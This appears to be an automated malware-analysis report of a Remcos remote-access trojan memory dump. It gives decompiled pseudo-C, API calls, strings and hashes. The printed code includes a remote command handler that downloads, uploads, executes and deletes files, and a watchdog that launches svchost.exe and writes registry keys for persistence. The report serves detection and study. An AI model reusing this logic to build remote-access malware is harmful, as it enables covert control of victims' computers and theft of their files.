C-Code - Quality: 58%

			E004027D1(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;

				_pop(_t7);
				_t4 = E0040169D(_t3, _t5, _t6, _a4, _a8, 1); // executed
				return _t4;
			}

0x004027d4
0x00402e92
0x00402e9b

APIs

std::_Deallocate.LIBCONCRT ref: 00402E92

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Deallocatestd::_
String ID:
API String ID: 1323251999-0
Opcode ID: fd0bdf4a69064b2d18053eefdb382f6c1a1f7578bd22aecd9d5e55026fa2e620
Instruction ID: 0585d7854aa17f8529017161725170d480745bba6486c72941cee94cd88e15ee
Opcode Fuzzy Hash: fd0bdf4a69064b2d18053eefdb382f6c1a1f7578bd22aecd9d5e55026fa2e620
Instruction Fuzzy Hash: 55C08C3208420C73CA0029C2EC06E76BB8D9720760F008032FE48281A1E5B3A970E2DA

Uniqueness

Uniqueness Score: -1.00%

Function 00404E0B, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404E0B(void* __ecx) {
				void* __esi;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t13;
				void* _t14;

				__imp__#3( *(__ecx + 4)); // executed
				 *(__ecx + 4) =  *(__ecx + 4) | 0xffffffff;
				if( *((char*)(__ecx + 1)) != 0) {
					_t9 = E0041C763(_t8, _t10,  *(__ecx + 0x44), _t13, _t14, __ecx);
					 *(__ecx + 0x44) =  *(__ecx + 0x44) & 0x00000000;
					return _t9;
				}
				return _t8;
			}

0x00404e11
0x00404e17
0x00404e1f
0x00404e24
0x00404e29
0x00000000
0x00404e29
0x00404e2e

APIs

closesocket.WS2_32(?), ref: 00404E11

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 13468e592387e6b0bb73e95ce9a68b7d52693f52b58467605d5206de11d35af6
Instruction ID: eb1b9387b60eb41774d792694da73fcf923298404fde03e5c9c312fc5c9b7129
Opcode Fuzzy Hash: 13468e592387e6b0bb73e95ce9a68b7d52693f52b58467605d5206de11d35af6
Instruction Fuzzy Hash: C3D0A771400B204FE3359B14EE0E75277E1AF01B26F008A2E91F7028E1C7B5AC40CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0042226A, Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 00422275

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: b02335b8f7ea2efaad70bddb1f33b0a78e66c9a69ef7c03d8dd5e29a9a49d19b
Instruction ID: fff77dfbf1f0459fa3aaeb9656e953647c3761fb795b74ea4a0806b79efbc88b
Opcode Fuzzy Hash: b02335b8f7ea2efaad70bddb1f33b0a78e66c9a69ef7c03d8dd5e29a9a49d19b
Instruction Fuzzy Hash: 70C04C79104608BB9B061FA19D08C793B69D7456617008025B90556151D576DA5096B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040697D, Relevance: 35.7, APIs: 7, Strings: 13, Instructions: 697
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040697D(short* __edx, void* __eflags, intOrPtr _a4) {
				char _v108;
				void* _v112;
				char _v132;
				char _v136;
				char _v140;
				char _v152;
				char _v156;
				char _v160;
				void* _v176;
				char _v180;
				char _v192;
				void* _v204;
				char _v208;
				char _v212;
				char _v216;
				void* _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				void* _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				char _v280;
				char _v284;
				char _v288;
				char _v292;
				char _v296;
				void* _v300;
				void* _v308;
				void* _v312;
				char _v324;
				char _v336;
				char _v344;
				char _v348;
				char _v368;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t160;
				signed int _t162;
				void* _t166;
				void* _t171;
				signed int _t172;
				void* _t187;
				void* _t202;
				signed int _t204;
				void* _t218;
				int _t228;
				void* _t235;
				void* _t236;
				void* _t249;
				void* _t256;
				signed int _t261;
				void* _t265;
				void* _t277;
				short* _t288;
				void* _t289;
				void* _t300;
				void* _t316;
				void* _t326;
				void* _t332;
				void* _t334;
				void* _t336;
				void* _t340;
				void* _t344;
				void* _t354;
				void* _t356;
				void* _t377;
				void* _t380;
				void* _t542;
				void* _t569;
				intOrPtr _t574;
				intOrPtr _t575;
				signed int _t576;
				signed int _t578;
				signed int _t581;
				void* _t588;
				void* _t590;
				void* _t592;
				void* _t594;
				void* _t596;
				signed int _t597;
				void* _t600;
				void* _t601;
				void* _t602;
				void* _t603;
				void* _t604;
				void* _t605;
				void* _t606;
				void* _t609;
				void* _t614;
				void* _t615;
				void* _t616;
				void* _t618;
				void* _t620;
				void* _t639;
				void* _t640;
				void* _t641;
				void* _t642;
				void* _t645;
				void* _t647;

				_t646 = __eflags;
				_t550 = __edx;
				_push(_t356);
				_t574 = _a4;
				_push(_t569);
				E004020EC(_t356,  &_v156, __edx, __eflags, _t574 + 0x1c);
				SetEvent( *(_t574 + 0x34));
				_t575 =  *((intOrPtr*)(L00401F95( &_v160)));
				E004042A6( &_v160,  &_v136, 4, 0xffffffff);
				_t600 = (_t597 & 0xfffffff8) - 0xec;
				E004020EC(0x46c238, _t600, _t550, _t646, 0x46c238);
				_t601 = _t600 - 0x18;
				E004020EC(0x46c238, _t601, _t550, _t646,  &_v152);
				E00417478( &_v288, _t550);
				_t602 = _t601 + 0x30;
				_t647 = _t575 - 0x8b;
				if(_t647 > 0) {
					_t576 = _t575 - 0x8c;
					__eflags = _t576;
					if(__eflags == 0) {
						E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
						_t160 = GetFileAttributesW(L00401EEB( &_v260));
						__eflags = _t160 & 0x00000010;
						if((_t160 & 0x00000010) == 0) {
							_t162 = DeleteFileW(L00401EEB( &_v260));
						} else {
							_t162 = E00417754(L00401EEB( &_v260));
						}
						__eflags = _t162;
						__eflags = _t162 & 0xffffff00 | _t162 != 0x00000000;
						if(__eflags == 0) {
							_t603 = _t602 - 0x18;
							E0041739C(0x46c238, _t603,  &_v252);
							_push(0x55);
							E00404AA4(0x46c238, 0x46c2e8,  &_v252, __eflags);
							_t166 = E0041733B( &_v208,  &_v280);
							_t604 = _t603 - 0x18;
							_t553 = "Unable to delete: ";
							E004075C2(0x46c238, _t604, "Unable to delete: ", _t569, __eflags, _t166);
							_t605 = _t604 - 0x14;
							_t377 = _t605;
							_push("[ERROR]");
						} else {
							_t187 = E0041733B( &_v180,  &_v252);
							_t609 = _t602 - 0x18;
							_t553 = "Deleted file: ";
							E004075C2(0x46c238, _t609, "Deleted file: ", _t569, __eflags, _t187);
							_t605 = _t609 - 0x14;
							_t377 = _t605;
							_push("[Info]");
						}
						E00402084(0x46c238, _t377);
						L00416C80(0x46c238, _t569);
						_t606 = _t605 + 0x30;
						E00401FC7();
						_t171 = L00401E49( &_v288, _t553, __eflags, 1);
						_t550 = "1";
						_t380 = _t171;
						_t172 = E00405A6F("1");
						__eflags = _t172;
						if(_t172 == 0) {
							L40:
							L00401EF0();
							L41:
							L00401E74( &_v284, _t550);
							E00401FC7();
							E00401FC7();
							return 0;
						} else {
							__eflags = E00407323( &_v272, _t380, _t380) + 1;
							E0040733F(E00407323( &_v272, _t380, _t380) + 1);
							_t550 =  &_v284;
							L00401EFA( &_v284,  &_v284, _t576, L00402FFA(0x46c238,  &_v212,  &_v284, 0x2a));
							L00401EF0();
							E0040427F(0x46c238, _t606 - 0x18, L00401EEB( &_v288));
							L39:
							E004061C3();
							goto L40;
						}
					}
					_t578 = _t576 - 1;
					__eflags = _t578;
					if(__eflags == 0) {
						E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
						E0040427F(0x46c238,  &_v216, L00401F95(L00401E49( &_v272, _t550, __eflags, 1)));
						E00407309( &_v276,  &_v252, 0, E00407323( &_v268,  &_v216,  &_v216) + 1);
						_t202 = L00401EEB(E00407629( &_v216,  &_v264,  &_v240));
						_t204 = E00439924(L00401EEB( &_v288), _t202);
						asm("sbb bl, bl");
						L00401EF0();
						_t361 =  ~_t204 + 1;
						__eflags =  ~_t204 + 1;
						if(__eflags == 0) {
							_t550 = E004075E6( &_v180, "Unable to rename file!", __eflags, 0x46c238);
							E00405343(_t361, _t602 - 0x18, _t206, _t569, __eflags, "16");
							_push(0x59);
							E00404AA4(_t361, 0x46c2e8, _t206, __eflags);
							E00401FC7();
						} else {
							_t550 =  &_v228;
							E00407514(_t602 - 0x18,  &_v228, __eflags, "*");
							E004061C3();
						}
						L00401EF0();
						L13:
						L00401EF0();
						goto L40;
					}
					_t581 = _t578 - 1;
					__eflags = _t581;
					if(__eflags == 0) {
						E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
						_t218 = L00401F95(L00401E49( &_v272, _t550, __eflags, 1));
						_t550 =  &_v264;
						CreateDirectoryW(L00401EEB(E00407514( &_v192,  &_v264, __eflags, _t218)), 0);
						L00401EF0();
						E00403300(0x2a);
						E00407350(0x46c238, _t602 - 0x18,  &_v264, __eflags,  &_v268);
						goto L39;
					}
					_t583 = _t581 - 3;
					__eflags = _t581 - 3;
					if(__eflags == 0) {
						_t228 = StrToIntA(L00401F95(L00401E49( &_v264, _t550, __eflags, _t583)));
						_t550 = L00401F95(L00401E49( &_v268, _t550, __eflags, 1));
						L00417F10(_t228, _t230);
					}
					goto L41;
				}
				if(_t647 == 0) {
					E004020D5(0x46c238,  &_v180);
					E0040484E(0x46c238,  &_v108, 1);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E00404A08(_t550);
					_t235 = L00401E49( &_v284, _t550, __eflags, 3);
					_t614 = _t602 - 0xfffffffffffffff8;
					_t236 = L00401E49( &_v288, _t550, __eflags, 2);
					L00402F93(0x46c238, _t614, L00402F93(0x46c238,  &_v236, L00402F93(0x46c238,  &_v260, L00402FB7( &_v284, L00401E49( &_v292, _t550, __eflags, 1), 0x46c238), __eflags, _t236), __eflags, 0x46c238), __eflags, _t235);
					E00404AA4(0x46c238,  &_v140, _t240, __eflags);
					E00401FC7();
					E00401FC7();
					E00401FC7();
					E0040427F(0x46c238,  &_v292, L00401F95(L00401E49( &_v324, _t240, __eflags, 0)));
					_t249 = E0041733B( &_v272,  &_v296);
					_t615 = _t614 - 0x18;
					E004075C2(0x46c238, _t615, "Downloading file: ", _t602 - 0x10, __eflags, _t249);
					_t616 = _t615 - 0x14;
					E00402084(0x46c238, _t616, "[Info]");
					L00416C80(0x46c238, "[Info]");
					E00401FC7();
					L00401EF0();
					_t256 = L00401F95(L00401E49( &_v336, "Downloading file: ", __eflags, 0));
					_t618 = _t616 + 0x30 - 0x18;
					E0040427F(0x46c238, _t618, _t256);
					_t261 = E004062D8( &_v192, __eflags, E004398A0(_t258, L00401F95(L00401E49( &_v344, "Downloading file: ", __eflags, 4)), 0, 0xa), "Downloading file: ", 0x56);
					_t620 = _t618 + 0x2c;
					_push(0);
					__eflags = _t261;
					if(__eflags == 0) {
						E0040427F(0x46c238,  &_v264, L00401F95(L00401E49( &_v348, "Downloading file: ", __eflags)));
						_t265 = E0041733B( &_v244,  &_v268);
						_t550 = "Failed to download file: ";
						E004075C2(0x46c238, _t620 - 0x18, "Failed to download file: ", "[Info]", __eflags, _t265);
						E00402084(0x46c238, _t620 - 4, "[ERROR]");
						L00416C80(0x46c238, "[Info]");
						E00401FC7();
						L00401EF0();
					} else {
						E0040427F(0x46c238,  &_v264, L00401F95(L00401E49( &_v348, "Downloading file: ", __eflags)));
						_t277 = E0041733B( &_v244,  &_v268);
						_t550 = "Downloaded file: ";
						E004075C2(0x46c238, _t620 - 0x18, "Downloaded file: ", "[Info]", __eflags, _t277);
						E00402084(0x46c238, _t620 - 4, "[Info]");
						L00416C80(0x46c238, "[Info]");
						E00401FC7();
						L00401EF0();
						E00402084(0x46c238, _t620 - 4 + 0x30 - 0x18, 0x45f6bc);
						_push(0x58);
						E00404AA4(0x46c238,  &_v156, "Downloaded file: ", __eflags);
					}
					E00404E0B( &_v140);
					L00404E2F(0x46c238,  &_v140, 0);
					L15:
					E00401FC7();
					goto L41;
				}
				_t588 = _t575 - 0x61;
				if(_t588 == 0) {
					E0040427F(0x46c238, _t602 - 0x18, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
					_t288 = L00401E49( &_v272, _t550, __eflags, 2);
					_t289 = L00401E49( &_v276, _t550, __eflags, 1);
					_t550 = _t288;
					E004169CC(_t289, _t288);
					goto L41;
				}
				_t590 = _t588 - 0x26;
				if(_t590 == 0) {
					GetLogicalDriveStringsA(0x64,  &_v108);
					E004020AB(0x46c238,  &_v252, _t550, __eflags,  &_v108, 0x64);
					__eflags = E00407397( &_v260, 0x45f860, 0, 2) + 1;
					L00401F84(E00407397( &_v260, 0x45f860, 0, 2) + 1);
					E004020EC(0x46c238, _t602 - 0x18, _t550, E00407397( &_v260, 0x45f860, 0, 2) + 1,  &_v276);
					_t300 = E00406406(0x46c238,  &_v256);
					_t550 = L00402FB7( &_v232,  &_v280, 0x46c238);
					L00402F1D(_t602 - 0x18, _t301, _t300);
					_push(0x51);
					E00404AA4(0x46c238, 0x46c2e8, _t301, __eflags);
					E00401FC7();
					E00401FC7();
					goto L15;
				}
				_t592 = _t590 - 1;
				if(_t592 == 0) {
					E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
					E00407350(0x46c238, _t602 - 0x18, _t550, __eflags,  &_v260);
					E004061C3();
					__eflags = E00402489() - 2;
					_t316 = E0041733B( &_v228, E00407309( &_v264,  &_v240, 0, E00402489() - 2));
					_t550 = "Browsing directory: ";
					E004075C2(0x46c238, _t602 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t569, E00402489() - 2, _t316);
					E00402084(0x46c238, _t602 - 0x18 + 0x18 - 4, "[Info]");
					L00416C80(0x46c238, _t569);
					E00401FC7();
					goto L13;
				}
				_t594 = _t592 - 1;
				if(_t594 == 0) {
					E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
					ShellExecuteW(0, L"open", L00401EEB( &_v260), 0, 0, 1);
					_t326 = E0041733B( &_v212,  &_v260);
					_t550 = "Executing file: ";
					E004075C2(0x46c238, _t602 - 0x18, "Executing file: ", _t569, __eflags, _t326);
					E00402084(0x46c238, _t602 - 4, "[Info]");
					L00416C80(0x46c238, _t569);
					E00401FC7();
					goto L40;
				} else {
					_t596 = _t594 - 1;
					_t652 = _t596;
					if(_t596 == 0) {
						E004072F6( &_v108);
						_t332 = L00401E49( &_v264, _t550, _t652, 3);
						_t639 = _t602 - 0x18;
						E004020EC(0x46c238, _t639, _t550, _t652, _t332);
						_t334 = L00401E49( &_v272, _t550, _t652, 2);
						_t640 = _t639 - 0x18;
						E004020EC(0x46c238, _t640, _t550, _t652, _t334);
						_t336 = L00401E49( &_v280, _t550, _t652, 1);
						_t641 = _t640 - 0x18;
						E004020EC(0x46c238, _t641, _t550, _t652, _t336);
						_push(L00401F95(L00401E49( &_v288, _t550, _t652, _t596)));
						_t340 = E004064A2( &_v136, _t550);
						_push(_t596);
						_t653 = _t340;
						if(_t340 == 0) {
							E0040427F(0x46c238,  &_v252, L00401F95(L00401E49( &_v368, _t550, __eflags)));
							_t344 = E0041733B( &_v232,  &_v256);
							_t642 = _t641 - 0x18;
							_t550 = "Failed to upload file: ";
							E004075C2(0x46c238, _t642, "Failed to upload file: ", _t569, __eflags, _t344);
							_t542 = _t642 - 0x14;
							_push("[ERROR]");
						} else {
							E0040427F(0x46c238,  &_v252, L00401F95(L00401E49( &_v368, _t550, _t653)));
							_t354 = E0041733B( &_v232,  &_v256);
							_t645 = _t641 - 0x18;
							_t550 = "Uploaded file: ";
							E004075C2(0x46c238, _t645, "Uploaded file: ", _t569, _t653, _t354);
							_t542 = _t645 - 0x14;
							_push("[Info]");
						}
						E00402084(0x46c238, _t542);
						L00416C80(0x46c238, _t569);
						E00401FC7();
						L00401EF0();
						L00407304(0x46c238,  &_v132, _t596);
					}
					goto L41;
				}
			}

0x0040697d
0x0040697d
0x0040698d
0x0040698f
0x00406992
0x00406997
0x0040699f
0x004069b9
0x004069c3
0x004069c8
0x004069d3
0x004069d8
0x004069e5
0x004069ee
0x004069f8
0x004069fb
0x004069fd
0x00406fad
0x00406fad
0x00406fb3
0x00407198
0x004071a7
0x004071b1
0x004071b3
0x004071c9
0x004071b5
0x004071bc
0x004071bc
0x004071cf
0x004071d8
0x004071da
0x00407201
0x00407206
0x0040720b
0x00407212
0x0040721f
0x00407224
0x00407227
0x0040722f
0x00407234
0x00407237
0x00407239
0x004071dc
0x004071e0
0x004071e5
0x004071e8
0x004071f0
0x004071f5
0x004071f8
0x004071fa
0x004071fa
0x0040723e
0x00407243
0x00407248
0x0040724f
0x0040725a
0x0040725f
0x00407264
0x00407266
0x0040726b
0x0040726d
0x004072c4
0x004072c8
0x004072cd
0x004072d1
0x004072dd
0x004072e6
0x004072f3
0x0040726f
0x0040727a
0x00407280
0x00407287
0x0040729a
0x004072a3
0x004072b7
0x004072bc
0x004072bc
0x00000000
0x004072c1
0x0040726d
0x00406fb9
0x00406fb9
0x00406fbc
0x00407097
0x004070b3
0x004070cf
0x004070e9
0x004070f9
0x00407108
0x0040710a
0x0040710f
0x0040710f
0x00407112
0x00407150
0x00407154
0x0040715a
0x00407161
0x0040716a
0x00407114
0x00407117
0x00407122
0x00407128
0x0040712d
0x00407173
0x00406c5f
0x00406c5f
0x00000000
0x00406c5f
0x00406fc2
0x00406fc2
0x00406fc5
0x00407022
0x00407035
0x0040703b
0x00407051
0x0040705b
0x00407066
0x00407075
0x00000000
0x00407075
0x00406fc7
0x00406fc7
0x00406fca
0x00406fe2
0x00406ffc
0x00407000
0x00407000
0x00000000
0x00406fca
0x00406a03
0x00406d53
0x00406d61
0x00406d77
0x00406d78
0x00406d79
0x00406d7a
0x00406d7b
0x00406d86
0x00406d8b
0x00406d98
0x00406dd2
0x00406de1
0x00406dea
0x00406df3
0x00406dfc
0x00406e19
0x00406e26
0x00406e2b
0x00406e36
0x00406e3b
0x00406e46
0x00406e4b
0x00406e57
0x00406e60
0x00406e71
0x00406e76
0x00406e7c
0x00406ea8
0x00406ead
0x00406eb4
0x00406eb5
0x00406eb7
0x00406f41
0x00406f4e
0x00406f56
0x00406f5e
0x00406f6d
0x00406f72
0x00406f7e
0x00406f87
0x00406eb9
0x00406eca
0x00406ed7
0x00406edf
0x00406ee7
0x00406ef2
0x00406ef7
0x00406f03
0x00406f0c
0x00406f1b
0x00406f20
0x00406f29
0x00406f29
0x00406f93
0x00406f9f
0x00406cff
0x00406cff
0x00000000
0x00406cff
0x00406a09
0x00406a0c
0x00406d21
0x00406d2c
0x00406d39
0x00406d3e
0x00406d42
0x00000000
0x00406d47
0x00406a12
0x00406a15
0x00406c73
0x00406c87
0x00406c9e
0x00406ca4
0x00406cb3
0x00406cbc
0x00406cd3
0x00406cd7
0x00406cdd
0x00406ce4
0x00406ced
0x00406cf6
0x00000000
0x00406cfb
0x00406a1b
0x00406a1e
0x00406be8
0x00406bf7
0x00406bfc
0x00406c0d
0x00406c26
0x00406c2e
0x00406c36
0x00406c45
0x00406c4a
0x00406c56
0x00000000
0x00406c5b
0x00406a24
0x00406a27
0x00406b6f
0x00406b88
0x00406b96
0x00406b9e
0x00406ba6
0x00406bb5
0x00406bba
0x00406bc6
0x00000000
0x00406a2d
0x00406a2d
0x00406a2d
0x00406a30
0x00406a3d
0x00406a48
0x00406a4d
0x00406a53
0x00406a5e
0x00406a63
0x00406a69
0x00406a74
0x00406a79
0x00406a7f
0x00406a95
0x00406a9d
0x00406aa6
0x00406aa7
0x00406aa9
0x00406afb
0x00406b08
0x00406b0d
0x00406b10
0x00406b18
0x00406b20
0x00406b22
0x00406aab
0x00406abc
0x00406ac9
0x00406ace
0x00406ad1
0x00406ad9
0x00406ae1
0x00406ae3
0x00406ae3
0x00406b27
0x00406b2c
0x00406b38
0x00406b41
0x00406b4d
0x00406b4d
0x00000000
0x00406a30

APIs

SetEvent.KERNEL32(?,?), ref: 0040699F
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406B88

Part of subcall function 004064A2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064ED

Part of subcall function 004062D8: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,[Info],00000000,0046C238,?,00406EAD,00000000), ref: 00406331
Part of subcall function 004062D8: WriteFile.KERNEL32(?,?,00000000,00406EAD,00000000,?,000186A0,00406EAD,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 00406379
Part of subcall function 004062D8: CloseHandle.KERNEL32(00000000,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 004063B3
Part of subcall function 004062D8: MoveFileW.KERNEL32(00000000,00000000), ref: 004063CB

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F

GetLogicalDriveStringsA.KERNEL32 ref: 00406C73
StrToIntA.SHLWAPI(00000000,?), ref: 00406FE2
CreateDirectoryW.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 00407051

Part of subcall function 004061C3: FindFirstFileW.KERNEL32(00000000,?,?,0046C238), ref: 004061DE

Strings

Uploaded file: , xrefs: 00406AD1
Downloading file: , xrefs: 00406E2E
Failed to upload file: , xrefs: 00406B10
open, xrefs: 00406B82
Downloaded file: , xrefs: 00406EDF
Unable to rename file!, xrefs: 0040713B
Executing file: , xrefs: 00406B9E
Unable to delete: , xrefs: 00407227
Browsing directory: , xrefs: 00406C2E
[ERROR], xrefs: 00406B22, 00406F68, 00407239
Deleted file: , xrefs: 004071E8
[Info], xrefs: 00406AE3, 00406BB0, 00406C40, 00406E3E, 00406E45, 00406EF1, 004071FA
Failed to download file: , xrefs: 00406F56

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: File$Create$CloseDirectoryDriveEventExecuteFindFirstHandleLocalLogicalMoveShellStringsTimeWritechar_traitssend
String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[ERROR]$[Info]$open
API String ID: 4189642951-1986272625
Opcode ID: 1f6703755000767a5f67cd65e7268118d2d2a33c34c8fd2d2e666a0488e9e463
Instruction ID: 2a12d23acd30ce868743ee3b5d09fdf4f29f8ef519bcce84dbcc6bced154e8ad
Opcode Fuzzy Hash: 1f6703755000767a5f67cd65e7268118d2d2a33c34c8fd2d2e666a0488e9e463
Instruction Fuzzy Hash: BD3292716183015BC608F776C8569AF77A9AF91348F40093FF942671E3EF389A09C69B

Uniqueness

Uniqueness Score: -1.00%

Function 0040FAC7, Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 194
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040FAC7(void* __eflags) {
				char _v28;
				char _v36;
				void* _v40;
				char _v56;
				void* _v64;
				char _v76;
				char _v84;
				void* _v88;
				char _v100;
				char _v104;
				void* _v108;
				char _v124;
				char _v128;
				long _v132;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t26;
				void* _t29;
				void* _t35;
				void* _t46;
				void* _t61;
				void* _t78;
				void* _t107;
				long _t112;
				long _t141;
				void* _t142;
				CHAR* _t143;
				void* _t145;
				signed int _t147;
				void* _t149;
				void* _t155;

				_t149 = (_t147 & 0xfffffff8) - 0x7c;
				_push(_t142);
				_t26 = GetCurrentProcessId();
				if(E00410BB0(0x46c518, L00401F95(0x46c518), "WD", _t26) != 0) {
					_t29 = OpenMutexA(0x100000, 0, "Mutex_RemWatchdog");
					__eflags = _t29;
					if(_t29 == 0) {
						E004020D5(0x46c518,  &_v100);
						E004179DC(L00401EEB(0x46c500),  &_v100);
						L00401F6D(0x46c518,  &_v124);
						__eflags = E00417614( &_v124);
						if(__eflags != 0) {
							_t35 = E0040427F(0x46c518,  &_v76, L"\\SysWOW64");
							L00401EFA( &_v132, _t37, _t142, E00403030( &_v36, E0040427F(0x46c518,  &_v56, E0043987F(0x46c518,  &_v76, __eflags, L"WinDir")), _t35));
							L00401EF0();
							L00401EF0();
						} else {
							_t61 = E0040427F(0x46c518,  &_v28, L"\\system32");
							L00401EFA( &_v132, _t63, _t142, E00403030( &_v84, E0040427F(0x46c518,  &_v56, E0043987F(0x46c518,  &_v28, __eflags, L"WinDir")), _t61));
							L00401EF0();
							L00401EF0();
						}
						L00401EF0();
						E0040766C(0x46c518,  &_v124, 0, L"\\svchost.exe");
						_t143 = L00401F95( &_v104);
						_t46 = E0041412B(L00401EEB( &_v128), _t143, 0x46bd50);
						_t150 = _t149 - 0x18;
						_t107 = _t149 - 0x18;
						__eflags = _t46;
						if(_t46 != 0) {
							E00402084(0x46c518, _t107, "Watchdog module activated");
							E00402084(0x46c518, _t150 - 0x18, "[Info]");
							L00416C80(0x46c518, 0);
							Sleep(0x7d0);
							_t112 =  *0x46bd58; // 0x0
							goto L13;
						}
						E00402084(0x46c518, _t107, "Watchdog launch failed!");
						E00402084(0x46c518, _t150 - 0x18, "[ERROR]");
						L00416C80(0x46c518, 0);
						CloseHandle( *0x46bd60);
						L00401EF0();
						E00401FC7();
						_push(3);
						_pop(1);
					} else {
						CloseHandle(_t29);
						_t155 = _t149 - 0x18;
						E00402084(0x46c518, _t155, "Remcos restarted by watchdog!");
						_t156 = _t155 - 0x18;
						E00402084(0x46c518, _t155 - 0x18, "[Info]");
						L00416C80(0x46c518, 0);
						E00402084(0x46c518, _t156 + 0x18, "Watchdog module activated");
						E00402084(0x46c518, _t156 + 0x18 - 0x18, "[Info]");
						L00416C80(0x46c518, 0);
						CreateThread(0, 0, E004100F9, 0, 0, 0);
						_t143 = "WDH";
						_t78 = E00410885(L00401F95(0x46c518), _t143,  &_v148);
						__eflags = _t78;
						if(_t78 == 0) {
							goto L1;
						} else {
							 *0x46bd50 = OpenProcess(0x1fffff, 0, _v132);
							L00410CE2(L00401F95(0x46c518), __eflags, _t143);
							_t112 = _v132;
							L13:
							L14();
							asm("int3");
							_push(_t143);
							_push(0);
							_t141 = _t112;
							L15:
							_t145 = OpenProcess(0x100000, 0, _t141);
							WaitForSingleObject(_t145, 0xffffffff);
							CloseHandle(_t145);
							__eflags =  *0x46bd4e;
							if(__eflags != 0) {
								E0040FAC7(__eflags, 0);
							}
							goto L15;
						}
						L17:
					}
				} else {
					L1:
				}
				return 1;
				goto L17;
			}

0x0040facd
0x0040fad1
0x0040fad3
0x0040faf6
0x0040fb0d
0x0040fb13
0x0040fb15
0x0040fba4
0x0040fbb9
0x0040fbc2
0x0040fbcc
0x0040fbce
0x0040fc2b
0x0040fc57
0x0040fc60
0x0040fc69
0x0040fbd0
0x0040fbd9
0x0040fc05
0x0040fc0e
0x0040fc17
0x0040fc1c
0x0040fc72
0x0040fc80
0x0040fc97
0x0040fca2
0x0040fca8
0x0040fcab
0x0040fcad
0x0040fcaf
0x0040fcb6
0x0040fcc5
0x0040fcca
0x0040fcd7
0x0040fcdd
0x00000000
0x0040fcdd
0x0040fcea
0x0040fcf9
0x0040fcfe
0x0040fd0c
0x0040fd16
0x0040fd1f
0x0040fd24
0x0040fd26
0x0040fb1b
0x0040fb1c
0x0040fb22
0x0040fb2c
0x0040fb31
0x0040fb3c
0x0040fb41
0x0040fb50
0x0040fb5b
0x0040fb60
0x0040fb72
0x0040fb7c
0x0040fb8c
0x0040fb93
0x0040fb95
0x00000000
0x0040fb9b
0x0040fd43
0x0040fd4f
0x0040fd55
0x0040fd59
0x0040fd59
0x0040fd5e
0x0040fd5f
0x0040fd60
0x0040fd61
0x0040fd63
0x0040fd71
0x0040fd76
0x0040fd7d
0x0040fd83
0x0040fd8a
0x0040fd8e
0x0040fd8e
0x00000000
0x0040fd8a
0x00000000
0x0040fb95
0x0040faf8
0x0040faf8
0x0040fafa
0x0040fd2d
0x00000000

APIs

GetCurrentProcessId.KERNEL32 ref: 0040FAD3

Part of subcall function 00410BB0: RegCreateKeyA.ADVAPI32(80000001,00000000,0045F6BC), ref: 00410BBE
Part of subcall function 00410BB0: RegSetValueExA.ADVAPI32(0045F6BC,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040A669,0045FEF8,00000001,000000AF,0045F6BC), ref: 00410BD9
Part of subcall function 00410BB0: RegCloseKey.ADVAPI32(0045F6BC,?,?,?,0040A669,0045FEF8,00000001,000000AF,0045F6BC), ref: 00410BE4

OpenMutexA.KERNEL32 ref: 0040FB0D
CloseHandle.KERNEL32(00000000), ref: 0040FB1C
